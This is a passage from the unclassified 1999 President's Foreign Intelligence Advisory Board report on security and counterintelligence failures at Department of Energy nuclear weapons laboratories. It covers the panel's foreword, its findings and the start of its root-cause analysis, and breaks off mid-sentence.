Intelligence Advisory Board's report to the President: Science at its Best; Security at its Worst: A Report on Security Problems at the U.S. Department of Energy, 9:30 a.m., SD-106. 18 June 1999: Add balance of HTML conversion. 15 June 1999. Thanks to the White House Office of the PFIAB (202) 456-2352. From: Jane_E._Baker@pfiab.eop.gov To: jya@jya.com, dellaratta@exchangemonitor.com, jhorowitz@tribune.com, bullfrog@enteract.com, catpano@nytimes.com, jpcarson@mindspring.com Date: Tue, 15 Jun 1999 15:34:33 -0400 Subject: PFIAB RPT See attached file: Report of Presidents Foreign Intelligence Advisory Board, "Science At Its Best, Security At Its Worst: A Report on Security Problems at the U.S. Department of Energy," June, 1999: http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf (72 pages; 420K) See attached file: Unclassified Appendix to PFIAB Report: http://www.whitehouse.gov/WH/EOP/pfiab/appendix.pdf (34 pages; 191K) Source: http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf SCIENCE AT ITS BEST __________________________ SECURITY AT ITS WORST A Report on Security Problems at the U.S. Department of Energy [Presidential Seal] ____________________________ A Special Investigative Panel President’s Foreign Intelligence Advisory Board JUNE 1999 ABSTRACT On March 18, 1999, President William J. Clinton requested that the President’s Foreign Intelligence Advisory Board (PFIAB) undertake an inquiry and issue a report on “the security threat at the Department of Energy’s weapons labs and the adequacy of the measures that have been taken to address it.” Specifically, the President asked the PFIAB to “address the nature of the present counterintelligence security threat, the way in which it has evolved over the last two decades and the steps we have taken to counter it, as well as to recommend any additional steps that may be needed.” He also asked the PFIAB “to deliver its completed report to the Congress, and to the fullest extent possible consistent with our national security, release an unclassified version to the public.” In response, the Honorable Warren B. Rudman, Chairman of PFIAB, appointed board members Ms. Ann Z. Caracristi, Dr. Sidney Drell, and Mr. Stephen Friedman to form the Special Investigative Panel and obtained detailees from several federal agencies (CIA, DOD, FBI) to augment the work of the PFIAB staff. Over the past three months, the panel and staff interviewed more than 100 witnesses, reviewed more than 700 documents encompassing thousands of pages, and conducted onsite research and interviews at five of the Department of Energy’s national laboratories and plants: Livermore, Los Alamos, Oak Ridge, Pantex, and Sandia. The panel has produced a report and an appendix of supporting documents, both of which are unclassified to the fullest extent possible. A large volume of classified material, which was also reviewed and distilled for this report, has been relegated to a second appendix that is available only to authorized recipients. This report examines: The 20–year history of security and counterintelligence issues at the DOE national laboratories, with an emphasis on the five labs that focus on weapons–related research; The inherent tension between security concerns and scientific freedom at the labs and its effect on the institutional culture and efficacy of the Department; The growth and evolution of the foreign intelligence threat to the national labs, particularly in connection with the Foreign Visitor’s Program of the labs; The implementation and effectiveness of Presidential Decision Directive No. 61, the reforms instituted by Secretary of Energy Bill Richardson, and other related initiatives; and, Additional measures that should be taken to improve security and counterintelligence at the labs. PANEL MEMBERS The Honorable Warren B. Rudman, Chairman of the President’s Foreign Intelligence Advisory Board. Senator Rudman is a partner in the law firm of Paul, Weiss, Rifkind, Wharton, and Garrison. From 1980 to 1992, he served in the U.S. Senate, where he was a member of the Select Committee on Intelligence. Previously, he was Attorney General of New Hampshire. Ms. Ann Z. Caracristi, board member. Ms. Caracristi, of Washington, DC, is a former Deputy Director of the National Security Agency, where she served in a variety of senior management positions over a 40–year career. She is currently a member of the DCI/Secretary of Defense Joint Security Commission and recently chaired a DCI Task Force on intelligence training. She was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community. Dr. Sidney D. Drell, board member. Dr. Drell, of Stanford, California is an Emeritus Professor of Theoretical Physics and a Senior Fellow at the Hoover Institution. He has served as a scientific consultant and advisor to several congressional committees, The White House, DOE, DOD, and the CIA. He is a member of the National Academy of Sciences and a past President of the American Physical Society. Mr. Stephen Friedman, board member. Mr. Friedman is Chairman of the Board of Trustees of Columbia University and a former Chairman of Goldman, Sachs, & Co. He was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community and the Jeremiah Panel on the National Reconnaissance Office. PFIAB STAFF Randy W. Deitering, Executive Director Mark F. Moynihan, Assistant Director Roosevelt A. Roy, Administrative Officer Frank W. Fountain, Assistant Director and Counsel Brendan G. Melley, Assistant Director Jane E. Baker, Research/Administrative Officer PFIAB ADJUNCT STAFF Roy B., Defense Intelligence Agency Karen DeSpiegelaere, Federal Bureau of Investigation Jerry L., Central Intelligence Agency Christine V., Central Intelligence Agency David W. Swindle, Department of Defense, Naval Criminal Investigative Service Joseph S. O’Keefe, Department of Defense, Office of the Secretary of Defense TABEL OF CONTENTS FOREWORD I-IV FINDINGS 1 ROOT CAUSES 7 An International Enterprise 7 Big, Byzantine, and Bewildering Bureaucracy 8 Lack of Accountability 10 Culture and Attitudes 11 Changing Times, Changing Missions 12 RECURRING VULNERABILITIES 13 Management and Planning 13 Physical Security 18 Screening and Monitoring Personnel 20 Protection of Classified and Sensitive Information 21 Tracking Nuclear Materials 22 Foreign Visitors’ Program 23 ASSESSMENTS 29 Responsibility 29 Record of the Clinton Team 30 The 1995 “Walk-In” Document 30 W-88 Investigation 31 Damage Assessment 35 PDD-61: Birth and Intent 36 Timeliness of PDD-61 37 Secretary Richardson’s Initiatives 38 Prospects for Reforms 39 Trouble Ahead 40 Back to the Future 41 REORGANIZATION 43 Leadership 43 Restructuring 46 RECOMMENDATIONS 53 ENDNOTES APPENDIX Map of DOE Installations Chronology of Events Chronology of Reports on DOE Damage Assessment of China’s Acquisition of U.S. Nuclear Information Presidential Decision Directive 61 Bibliography FOREWORD FROM THE SPECIAL INVESTIGATIVE PANEL For the past two decades, the Department of Energy has embodied science at its best and security of secrets at its worst. Within DOE are a number of the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—DOE has provided the nation with far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they undoubtedly will continue to provide both technological benefits and inspiration for the progress of generations to come. The vitality of its national laboratories is derived to a great extent from their ability to attract talent from the widest possible pool, and they should continue to capitalize on the expertise of immigrant scientists and engineers. However, we believe that the dysfunctional structure at the heart of the Department has too often resulted in the mismanagement of security in weapons–related activities and a lack of emphasis on counterintelligence. DOE was created in 1977 and heralded as the centerpiece of the federal solution to the energy crisis that had stunned the American economy. A vital part of this new initiative was the Energy Research and Development Administration (ERDA), the legacy agency of the Atomic Energy Commission (AEC) and inheritor of the national programs to develop safe and reliable nuclear weapons. The concept, at least, was straightforward: take the diverse and dispersed energy research centers of the nation, bring them under an umbrella organization with other energy–related enterprises, and spark their scientific progress through closer contacts and centralized management. __________________________________ At the birth of DOE, the brilliant scientific breakthroughs of the nuclear weapons laboratories came with a troubling record of security administration. Twenty years later, virtually every one of its original problems persists. However, the brilliant scientific breakthroughs at the nuclear weapons laboratories came with a very troubling record of security administration. For example, classified documents detailing the designs of the most advanced nuclear weapons were found on library shelves accessible to the public at the Los Alamos laboratory. Employees and researchers were receiving little, if any, training or instruction regarding espionage threats. Multiple chains of command and standards of performance negated accountability, resulting in pervasive inefficiency, confusion, and mistrust. Competition among laboratories for contracts, and among researchers for talent, resources, and support distracted management from security issues. Fiscal management was bedeviled by sloppy accounting. Inexact tracking of the quantities and flows of nuclear materials was a persistent worry. Geographic decentralization fractured policy implementation and changes in leadership regularly depleted the small reservoirs of institutional memory. Permeating all of these issues was a prevailing cultural attitude among some in the DOE scientific community that regarded the protection of nuclear know–how with either fatalism or naiveté. Twenty years later, every one of these problems still existed. Most still exist today. __________________________________ The panel found a department saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of denial. In response to these problems, the Department has been the subject of a nearly unbroken history of dire warnings and attempted but aborted reforms. A cursory review of the open-source literature on the DOE record of management presents an abysmal picture. Second only to its world–class intellectual feats has been its ability to fend off systemic change. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. No President, Energy Secretary, or Congress has been able to stem the recurrence of fundamental problems. All have been thwarted time after time by the intransigence of this institution. The Special Investigative Panel found a large organization saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of denial. For instance, even after President Clinton issued Presidential Decision Directive 61 ordering that the Department make fundamental changes in security procedures, compliance by Department bureaucrats was grudging and belated. Time after time over the past few decades, officials at DOE headquarters and the weapons labs themselves have been presented with overwhelming evidence that their lackadaisical oversight could lead to an increase in the nuclear threat against the United States. Throughout its history, the Department has been the subject of scores of critical reports from the General Accounting Office (GAO), the intelligence community, independent commissions, private management consultants, its Inspector General, and its own security experts. It has repeatedly attempted reforms. Yet the Department’s ingrained behavior and values have caused it to continue to falter and fail. PROSPECTS FOR REFORMS We believe that Secretary of Energy Richardson, in attempting to deal with many critical security matters facing the Department, is on the right track in some, though not all, of his changes. We concur with and encourage many of his recent initiatives, and we are heartened by his aggressive approach and command of the issues. But we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.” After a review of more than 700 reports and studies, thousands of pages of classified and unclassified source documents, interviews with scores of senior federal officials, and visits to several of the DOE laboratories at the heart of this inquiry, the Special Investigative Panel has concluded the Department of Energy is incapable of reforming itself—bureaucratically and culturally—in a lasting way, even under an activist Secretary. The panel has found that DOE and the weapons laboratories have a deeply rooted culture of low regard for and, at times, hostility to security issues, which has continually frustrated the efforts of its internal and external critics, notably the GAO and the House Energy and Commerce Committee. Therefore, a reshuffling of offices and lines of accountability may be a necessary step toward meaningful reform, but it almost certainly will not be sufficient. Even if every aspect of the ongoing structural reforms is fully implemented, the most powerful guarantor of security at the nation’s weapons laboratories will not be laws, regulations, or management charts. It will be the attitudes and behavior of the men and women who are responsible for the operation of the labs each day. These will not change overnight, and they are likely to change only in a different cultural environment—one that values security as a vital and integral part of day–to–day activities and believes it can coexist with great science. We are convinced that when Secretary Richardson vacates the office his successor is not likely to have a comparable appreciation of the gravity of the Department’s past problems, nor a comparable interest in resolving them. The next Secretary of Energy will not have spent months at the tip of the sword created by the recent public outcry over DOE mismanagement of national secrets. Indeed, the core of the Department’s bureaucracy is quite capable of undoing Secretary Richardson’s reforms, and may well be inclined to do so if given the opportunity. Ultimately, the nature of the institution and the structure of the incentives under a culture of scientific research require great attention if they are to be made compatible with the levels of security and the degree of command–and–control warranted where the research and stewardship of nuclear weaponry is concerned. Yet it must be done. THE PFIAB INQUIRY The PFIAB panel is fully aware of the many recent allegations of management failures surrounding the Department of Energy and questions about the subsequent roles of entities such as the Department of Justice, the Federal Bureau of Investigation, and the Central Intelligence Agency. Much of the research we conducted has relevance to these allegations. However, the depth and the complexity of the issues call for examinations by institutions with greater resources and a wider charter: namely, Congress and standing executive agencies of the federal government. In the 90 days of our inquiry, the PFIAB panel conducted numerous interviews with senior federal officials who agreed to speak candidly—with the understanding that they would not be identified by name—about DOE’s problems and recent events. On balance, the panel finds that some very damaging security compromises may have occurred, as alleged by some in recent weeks. But we believe that in matters of intelligence and counterintelligence, one cannot brush off the reality that conclusions are often intrinsically based on probabilities, rather than certainties. Leaders, of course, are often obliged to act, and should act, based on the probability of impending danger, not only its certainty. And those entrusted with the public weal are indisputably served better by having more information about risks than less. So the panel would like to note the contributions of those who have helped to raise the public’s awareness of the risks to national security posed by problems at DOE. Although we do not concur with all of their conclusions, we believe that both intelligence officials at the Department of Energy and the members of the Cox Committee made substantial and constructive contributions to understanding and resolving security problems at DOE. As we note later in this report, we concur on balance with the damage assessment of espionage losses conducted by the Director of Central Intelligence. We also concur with the findings of the independent review of that assessment by Admiral David Jeremiah and his panel. Our mandate from President Clinton was restricted to an analysis of the structural and management problems in the Department’s security and counterintelligence operations. We abided by that. We also recognize the unique nature of the assignment given to us by the President. Never before in its history of more than 35 years has the PFIAB prepared a report for release to the general public. As a result, we have taken pains to ensure that the language of this report is “plain English,” not bureaucratese, and that the findings of the report are stated directly and candidly, not with the indirection and euphemisms often employed by policy insiders. SOLUTIONS Our panel has concluded that the Department of Energy, when faced with a profound public responsibility, has failed. Therefore, this report suggests two alternative organizational solutions, both of which we believe would substantially insulate the weapons laboratories from many of DOE’s historical problems and promote the building of a responsible culture over time. We also offer recommendations for improving various aspects of security and counterintelligence at DOE, such as personnel assurance, cyber–security, program management, and interdepartmental cooperation under the Foreign Intelligence Surveillance Act of 1978. The weapons research and stockpile management functions should be placed wholly within a new semi–autonomous agency within DOE that has a clear mission, streamlined bureaucracy, and drastically simplified lines of authority and accountability. Useful lessons along these lines can be taken from the National Security Agency (NSA) or Defense Advanced Research Projects Agency (DARPA) within the Department of Defense or the National Oceanographic and Atmospheric Administration (NOAA) within the Department of Commerce. The other alternative is a wholly independent agency, such as the National Aeronautics and Space Administration (NASA). There was substantial debate among the members of the panel about these two alternatives. Both have strengths and weaknesses. In the final analysis, the decision rests in the hands of the President and the Congress, and we trust that they will give serious deliberation to the merits and shortcomings of the alternatives before enacting major reforms. We all agree, nonetheless, that the labs should never be subordinated to the Department of Defense. With either proposal it will be important for the weapons labs to maintain effective scientific contact on nonclassified scientific research with the other DOE labs and the wider scientific community. To do otherwise would work to the detriment of the nation’s scientific progress and security over the long run. This argument draws on history: nations that honor and advance freedom of inquiry have fared better than those who have sought to arbitrarily suppress and control the community of science. __________________________________ The nuclear weapons and research functions of DOE need more autonomy, a clearer mission, a streamlined bureaucracy, and increased accountability. However, we would submit that we do not face an either/or proposition. The past 20 years have provided a controlled experiment of a sort, the results of which point to institutional models that hold promise. Organizations such as NASA and DARPA have advanced scientific and technological progress while maintaining a respectable record of security. Meanwhile, the Department of Energy, with its decentralized structure, confusing matrix of cross–cutting and overlapping management, and shoddy record of accountability has advanced scientific and technological progress, but at the cost of an abominable record of security with deeply troubling threats to American national security. Thomas Paine once said that “government, even in its best state, is but a necessary evil; in its worst state, an intolerable one.” This report finds that DOE’s performance, throughout its history, should have been regarded as intolerable. We believe the results and implications of this experiment are clear. It is time for the nation’s leaders to act decisively in the defense of America’s national security. Warren Rudman Chairman of the President’s Foreign Intelligence Advisory Board Ms. Ann Caracristi Board Member Dr. Sidney Drell Board Member Mr. Stephen Friedman Board Member FINDINGS On March 18, 1999, President Clinton tasked the Foreign Intelligence Advisory Board to review the history of the security and counterintelligence threats to the nation’s weapons labs and the effectiveness of the responses by the U.S. government. He also asked the Board to propose further improvements. This report, based on reviews of hundreds of source documents and studies, analysis of intelligence reports, and scores of interviews with senior level officials from several administrations, was prepared over the past 90 days in fulfillment of the President’s request. BOTTOM LINE Our bottom line: DOE represents the best of America’s scientific talent and achievement, but it has also been responsible for the worst security record on secrecy that the members of this panel have ever encountered. The national labs of the Department of Energy are among the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—it has provided the nation with far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they will undoubtedly provide both technological benefits and inspiration for the progress of generations to come. Its vibrancy is derived to a great extent from its ability to attract talent from the widest possible pool, and it should continue to capitalize on the expertise of immigrant scientists and engineers. However, the Department has devoted far too little time, attention, and resources to the prosaic but grave responsibilities of security and counterintelligence in managing its weapons and other national security programs. FINDINGS The preponderance of evidence accumulated by the Special Investigative Panel, spanning the past 25 years, has compelled the members to reach many definite conclusions—some very disturbing—about the security and well–being of the nation’s weapons laboratories. As the repository of America’s most advanced know-how in nuclear and related armaments and the home of some of America’s finest scientific minds, these labs have been and will continue to be a major target of foreign intelligence services, friendly as well as hostile. Two landmark events, the end of the Cold War and the overwhelming victory of the United States and its allies in the Persian Gulf War, markedly altered the security equations and outlooks of nations throughout the world. Friends and foes of the United States intensified their efforts to close the technological gap between their forces and those of America, and some redoubled their efforts in the race for weapons of mass destruction. Under the restraints imposed by the Comprehensive Test Ban Treaty, powerful computers have replaced detonations as the best available means of testing the viability and performance capabilities of new nuclear weapons. So research done by U.S. weapons laboratories with high performance computers stands particularly high on the espionage hit list of other nations, many of which have used increasingly more sophisticated and diverse means to obtain the secrets necessary to join the nuclear club. ______________________________________ Snapshot: DOE Weapons Operations Percentage of Budget: Roughly $6 billion, a third of the Department’s $18 billion FY99 budget. Allocation of Weapons-Related Budget: Defense Programs $4.4 billion Nonproliferation/Nat. Sec. 0.7 Fissile Material Disposal 0.2 Naval Reactors 0.7 Number of Contract Employees: 34,190 Number of Contract Employees Per Lab Los Alamos 6,900 Sandia 7,500 L. Livermore 6,400 Pantex 2,860 Oak Ridge (Y-12) 5,500 Kansas City 3,150 Nevada Test Site 1,880 SOURCE: DEPT. OF ENERGY FIELD FACTBOOK, MAY 1998 More than 25 years worth of reports, studies and formal inquiries—by executive branch agencies, Congress, independent panels, and even DOE itself—have identified a multitude of chronic security and counterintelligence problems at all of the weapons labs (See Appendix). These reviews produced scores of stern, almost pleading, entreaties for change. Critical security flaws—in management and planning, personnel assurance, some physical security areas, control of nuclear materials, protection of documents and computerized information, and counterintelligence—have been cited for immediate attention and resolution … over and over and over … ad nauseam. The open–source information alone on the weapons laboratories overwhelmingly supports a troubling conclusion: their security and counterintelligence operations have been seriously hobbled and relegated to low-priority status for decades. The candid, closed–door testimony of current and former federal officials as well as the content of voluminous classified materials received by this panel in recent weeks reinforce this conclusion. When it comes to a genuine understanding of and appreciation for the value of security and counterintelligence programs, especially in the context of America’s nuclear arsenal and secrets, the DOE and its weapons labs have been Pollyannaish. The predominant attitude toward security and counterintelligence among many DOE and lab managers has ranged from half–hearted, grudging accommodation to smug disregard. Thus the panel is convinced that the potential for major leaks and thefts of sensitive information and material has been substantial. Moreover, such security lapses would have occurred in bureaucratic environments that would have allowed them to go undetected with relative ease. Organizational disarray, managerial neglect, and a culture of arrogance—both at DOE headquarters and the labs themselves—conspired to create an espionage scandal waiting to happen. The physical security efforts of the weapons labs (often called the “guns, guards, and gates”) have had some isolated shortcomings, but on balance they have developed some of the most advanced security technology in the world. However, perpetually weak systems of personnel assurance, information security, and counterintelligence have invited attack by foreign intelligence services. Among the defects this panel found: Inefficient personnel clearance programs, wherein haphazard background investigations could take years to complete and the backlogs numbered in the tens of thousands. Loosely controlled and casually monitored programs for thousands of unauthorized foreign scientists and assignees—despite more than a decade of critical reports from the General Accounting Office, the DOE Inspector General, and the intelligence community. This practice occasionally created bizarre circumstances in which regular lab employees with security clearances were supervised by foreign nationals on temporary assignment. Feckless systems for control of classified documents, which periodically resulted in thousands of documents being declared lost. Counterintelligence programs with part–time CI officers, who often operated with little experience, minimal budgets, and employed little more than crude “awareness” briefings of foreign threats and perfunctory and sporadic debriefings of scientists travelling to foreign countries. A lab security management reporting system that led everywhere but to responsible authority. Computer security methods that were naive at best and dangerously irresponsible at worst. Why were these problems so blatantly and repeatedly ignored? DOE has had a dysfunctional management structure and culture that only occasionally gave proper credence to the need for rigorous security and counterintelligence programs at the weapons labs. For starters, there has been a persisting lack of real leadership and effective management at DOE. The nature of the intelligence–gathering methods used by the People’s Republic of China poses a special challenge to the U.S. in general and the weapons labs in particular. More sophisticated than some of the blatant methods employed by the former Soviet bloc espionage services, PRC intelligence operatives know their strong suits and play them extremely well. Increasingly more nimble, discreet and transparent in their spying methods, the Chinese services have become very proficient in the art of seemingly innocuous elicitations of information. This modus operandi has proved very effective against unwitting and ill–prepared DOE personnel. Despite widely publicized assertions of wholesale losses of nuclear weapons technology from specific laboratories to particular nations, the factual record in the majority of cases regarding the DOE weapons laboratories supports plausible inferences—but not irrefutable proof—about the source and scope of espionage and the channels through which recipient nations received information. The panel was not charged, nor was it empowered, to conduct a technical assessment regarding the extent to which alleged losses at the national weapons laboratories may have directly advanced the weapons development programs of other nations. However, the panel did find these allegations to be germane to issues regarding the structure and effectiveness of DOE security programs, particularly the counterintelligence functions. The classified and unclassified evidence available to the panel, while pointing out systemic security vulnerabilities, falls short of being conclusive. The actual damage done to U.S. security interests is, at the least, currently unknown; at worst, it may be unknowable. Numerous variables are inescapable. Analysis of indigenous technology development in foreign research laboratories is fraught with uncertainty. Moreover, a nation that is a recipient of classified information is not always the sponsor of the espionage by which it was obtained. However, the panel does concur, on balance, with the findings of the recent DCI–sponsored damage assessment. We also concur with the findings of the subsequent independent review, led by retired Admiral David Jeremiah, of that damage assessment. The Department of Energy is a dysfunctional bureaucracy that has proven it is incapable of reforming itself. Accountability at DOE has been spread so thinly and erratically that it is now almost impossible to find. The long traditional and effective method of entrenched DOE and lab bureaucrats is to defeat security reform initiatives by waiting them out. They have been helped in this regard by the frequent changes in leadership at the highest levels of DOE—nine Secretaries of Energy in 22 years. Eventually, the reform–minded management transitions out, either due to a change in administrations or as a result of the traditional “revolving door” management practices at DOE. Then the bureaucracy reverts to old priorities and predilections. Such was the case in December 1990 with the reform recommendations carefully crafted by a special task force commissioned by then–Energy Secretary Watkins. The report skewered DOE for unacceptable “direction, coordination, conduct, and oversight” of safeguards and security. Two years later, the new administration rolled in, redefined priorities, and the initiatives all but evaporated. Deputy Secretary Charles Curtis in late 1996 investigated clear indications of serious security and CI problems and drew up a list of initiatives in response. Those initiatives also were dropped after he left office. Reorganization is clearly warranted to resolve the many specific problems with security and counterintelligence in the weapons laboratories, but also to address the lack of accountability that has become endemic throughout the entire Department. Layer upon layer of bureaucracy, accumulated over the years, has diffused responsibility to the point where scores claim it, no one has enough to make a difference, and all fight for more. Convoluted, confusing, and often contradictory reporting channels make the relationship between DOE headquarters and the labs, in particular, tense, internecine, and chaotic. In between the headquarters and the laboratories are field offices, which the panel found to be a locus of much confusion. In background briefings of the panel, senior DOE officials often described them as redundant operations that function as a shadow headquarters, often using their political clout and large payrolls to push their own agendas and budget priorities in Congress. Even with the latest DOE restructuring, the weapons labs are reporting to far too many DOE masters. The criteria for the selection of Energy Secretaries have been inconsistent in the past. Regardless of the outcome of ongoing or contemplated reforms, the minimum qualifications for an Energy Secretary should include experience in not only energy and scientific issues, but national security and intelligence issues as well. The list of former Secretaries, Deputy Secretaries, and Under Secretaries meeting all of these criteria is very short. Despite having a large proportion of its budget (roughly 30 percent) devoted to functions related to nuclear weapons, the Department of Energy has often been led by men and women with little expertise and background in national security. The result has been predictable: security issues have been a low priority, and leaders unfamiliar with these issues have delegated decisionmaking to lesser–ranking officials who lacked the incentives and authority to address problems with dispatch and forcefulness. For a Department in desperate need of strong leadership on security issues, this has been a disastrous trend. The bar for future nominees at the upper levels of the Department needs to be raised significantly. DOE cannot be fixed with a single legislative act: management must follow mandate. The research functions of the labs are vital to the nation’s long term interest, and instituting effective gates between weapons and nonweapons research functions will require both disinterested scientific expertise, judicious decisionmaking, and considerable political finesse. Thus both Congress and the executive branch—whether along the lines suggested by the Special Investigative Panel or others—should be prepared to monitor the progress of the Department’s reforms for years to come. This panel has no illusions about the future of security and counterintelligence at DOE. There is little reason to believe future DOE Secretaries will necessarily share the resolve of Secretary Richardson, or even his interest. When the next Secretary of Energy is sworn in, perhaps in the spring of 2001, the DOE and lab bureaucracies will still have advantages that could give them the upper hand: time and proven skills at artful dodging and passive intransigence. The Foreign Visitors’ and Assignments Program has been and should continue to be a valuable contribution to the scientific and technological progress of the nation. Foreign nationals working under the auspices of U.S. weapons labs have achieved remarkable scientific advances and contributed immensely to a wide array of America’s national security interests, including nonproliferation. Some have made contributions so unique that they are all but irreplaceable. The value of these contacts to the nation should not be lost amid the attempt to address deep, well–founded concerns about security lapses. That said, DOE clearly requires measures to ensure that legitimate use of the research laboratories for scientific collaboration is not an open door to foreign espionage agents. Losing national security secrets should never be accepted as an inevitable cost of obtaining scientific knowledge. In commenting on security issues at DOE, we believe that both Congressional and Executive Branch leaders have resorted to simplification and hyperbole in the past few months. The panel found neither the dramatic damage assessments nor the categorical reassurances of the Department’s advocates to be wholly substantiated. We concur with and encourage many of Secretary Richardson’s recent initiatives to address the security problems at the Department, and we are heartened by his aggressive approach and command of the issues. He has recognized the organizational dysfunction and cultural vagaries at DOE and taken strong, positive steps to try to reverse the legacy of more than 20 years of security mismanagement. However, the Board is extremely skeptical that any reform effort, no matter how well–intentioned, well–designed, and effectively applied, will gain more than a toehold at DOE, given its labyrinthine management structure, fractious and arrogant culture, and the fast–approaching reality of another transition in DOE leadership. Thus we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.” Similarly, the evidence indicating widespread security vulnerabilities at the weapons laboratories has been ignored for far too long, and the work of the Cox Committee and intelligence officials at the Department has been invaluable in gaining the attention of the American public and in helping focus the political will necessary to resolve these problems. Nonetheless, there have been many attempts to take the valuable coin of damaging new information and decrease its value by manufacturing its counterfeit, innuendo; possible damage has been minted as probable disaster; workaday delay and bureaucratic confusion have been cast as diabolical conspiracies. Enough is enough. Fundamental change in DOE’s institutional culture—including the ingrained attitudes toward security among personnel of the weapons laboratories—will be just as important as organizational redesign. Never have the members of the Special Investigative Panel witnessed a bureaucratic culture so thoroughly saturated with cynicism and disregard for authority. Never before has this panel found such a cavalier attitude toward one of the most serious responsibilities in the federal government—control of the design information relating to nuclear weapons. Particularly egregious have been the failures to enforce cyber–security measures to protect and control important nuclear weapons design information. Never before has the panel found an agency with the bureaucratic insolence to dispute, delay, and resist implementation of a Presidential directive on security, as DOE’s bureaucracy tried to do to the Presidential Decision Directive No. 61 in February 1998. The best nuclear weapons expertise in the U.S. government resides at the national weapons labs, and this asset should be better used by the intelligence community. For years, the PFIAB has been keen on honing the intelligence community’s analytic effectiveness on a wide array of nonproliferation areas, including nuclear weapons. We believe that the DOE Office of Intelligence, particularly its analytic component, has historically been an impediment to this goal because of its ineffective attempts to manage the labs’ analysis. The office’s mission and size (about 70 people) is totally out of step with the Department’s intelligence needs. A streamlined intelligence liaison body, much like Department of Treasury’s Office of Intelligence Support—which numbers about 20 people, including a 24–hour watch team—would be far more appropriate. It should concentrate on making the intelligence community, which has the preponderance of overall analytic experience, more effective in fulfilling the DOE’s analysis and collection requirements. ROOT CAUSES The sources of DOE’s difficulties in both overseeing scientific research and maintaining security are numerous and deep. The Special Investigative Panel primarily focused its inquiry on the areas within DOE where the tension between science and security is most critical: the nuclear weapons laboratories.1 To a lesser extent, the panel examined security issues in other areas of DOE and broad organizational issues that have had a bearing on the functioning of the laboratories. Inherent in the work of the weapons laboratories, of course, is the basic tension between scientific inquiry, which thrives on freewheeling searches for and wide dissemination of information, and governmental secrecy, which requires just the opposite. But the historical context in which the labs were created and thrived has also figured into their subsequent problems with security. AN INTERNATIONAL ENTERPRISE U.S. research laboratories have always had a tradition of drawing on immigrant talent. Perhaps the first foreign–born contributor to our nation’s nuclear program was Albert Einstein. In his letter to President Roosevelt on August 2, 1939, Einstein advised the President of the possibility of the atomic bomb and the urgent need for government action. By 1943, the ranks of the Manhattan project at Los Alamos, New Mexico were filled with scientists and engineers from Italy (Fermi), Germany (Bethe), Poland (Ulam), Hungary (Wigner, Szilard, Von Neumann, and Teller), Russia (Kistiakovsy) and Austria (Rabi). Indeed, it is possible that the atomic bomb would never have been completed but for immigrant talent, and the diversity of talent applied to the project was hailed at the time as a model of international cooperation. Eleanor Roosevelt, in a 1945 radio address, declared that the development of the atomic bomb by “many minds belonging to different races and different religions sets the pattern for the way in which in the future we may be able to work out our difficulties.”2 The role of and reliance on immigrant talent in the United States—particularly at the graduate school and doctoral levels where much of the nation’s research is performed—has increased over the years. From 1975 to 1992, the aging of America’s baby boomers resulted in a decline in the overall size of the college–age population and, unlike other industrialized nations, the U.S. saw a decline in the number of American students receiving science and engineering degrees.3 From the 1950s until 1995, the number of non–U.S. citizens who earned doctorates in scientific and engineering fields from American universities steadily climbed, reaching 27 percent by 1985 and 40 percent by 1995. Two–thirds of those receiving those doctorates in 1995 held temporary residency visas, and Chinese doctoral recipients outnumbered recipients from all other regions combined.4 But the willingness to draw on foreign talent also has meant a greater risk of falling prey to those with foreign allegiances. One of the earliest and most infamous espionage scandals at the nation’s nuclear laboratories was centered on the physicist Klaus Fuchs, a German native and naturalized British citizen who spied on researchers at Los Alamos for the Soviet Union. More recent instances of actual and alleged foreign espionage at the nuclear weapons laboratories are detailed in the Classified Appendix to this report. As growth of the U.S. talent pool in science and engineering stagnated, and the amount of available talent abroad grew rapidly, the U.S. has had to rely on more foreign–born talent in national scientific research and development programs in order to maintain the best research facilities in the world. At the same time, since the end of the Cold War, DOE has entered into more extensive cooperative programs with foreign nations in efforts to reduce the threats of proliferation and diversion of nuclear weapons material. By June 1990, DOE had entered into 157 bilateral research and development agreements for scientific exchange purposes. Among others, parties to the agreements were the Soviet Union, the People’s Republic of China, Soviet bloc nations and countries that posed nuclear proliferation threats.5 In December 1990, a report to the DOE Secretary noted “a high probability of greatly increasing numbers of foreign visits and assignments to DOE facilities in future years.”6 The widening of foreign contacts concurrent with a greater influx of foreign–born talent has raised concerns about security compromises by scientists with foreign allegiances and highlighted the need for special care in implementing formal clearance procedures for involvement in classified work. BIG, BYZANTINE, AND BEWILDERING BUREAUCRACY DOE is not one of the federal government’s largest agencies in absolute terms, but its organizational structure is widely regarded as one of the most confusing. That is another legacy of its origins, and it has made the creation, implementation, coordination, and enforcement of consistent policies very difficult over the years. The effort to develop the atomic bomb was managed through an unlikely collaboration of the Manhattan Engineering District of the U.S. Army Corps of Engineers (hence the name, “the Manhattan Project”) and the University of California—two vastly dissimilar organizations in both culture and mission. The current form of the Department took shape in the first year of the Carter Administration through the merging of more than 40 different government agencies and organizations, an event from which it has arguably never recovered. The newly created DOE subsumed the Federal Energy Administration, the Energy Research and Development Administration (ERDA), the Federal Power Commission, and components and programs of several other government agencies. Included were the nuclear weapons research laboratories that were part of the ERDA and, formerly, of the Atomic Energy Commission. Many of these agencies and organizations have continued to operate under the DOE umbrella with the same organizational structure that they had prior to joining the Department. Even before the new Department was created, concerns were raised about how high the nuclear weapons–related operations would rank among the competing priorities of such a large bureaucracy. A study of the issue completed in the last year of the Ford Administration considered three alternatives: shifting the weapons operations to the Department of Defense, creating a new freestanding agency, or keeping the program within ERDA—the options still being discussed more than 20 years later. As one critic of the DOE plan told The Washington Post, “Under the AEC, weapons was half the program. Under ERDA, it was one–sixth. Under DOE, 